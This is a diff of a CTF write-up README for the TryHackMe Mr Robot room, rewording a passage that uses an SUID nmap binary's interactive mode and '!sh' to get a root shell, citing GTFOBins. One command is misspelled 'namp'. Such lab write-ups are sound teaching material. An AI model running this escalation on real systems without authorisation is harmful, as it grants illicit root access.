adampawelczyk/ctf-writeups/thm/mr-robot-ctf/README.md

 ### Exploit Nmap SUID for Shell

-We go to the [GTFOBins](https://gtfobins.github.io/) to see how we can exploit `nmap`.
+The [GTFOBins](https://gtfobins.github.io/) website is checked for a method to exploit `nmap`.

-As we can see on the page we can launch `nmap` in the interactive mode:
+The page shows that `nmap` can be launched in interactive mode:

 ```bash
 namp --interactive
 ```
-Then we can obtain the `root` shell:
+Executing the following results in a root shell:

 ```bash
 nmap> !sh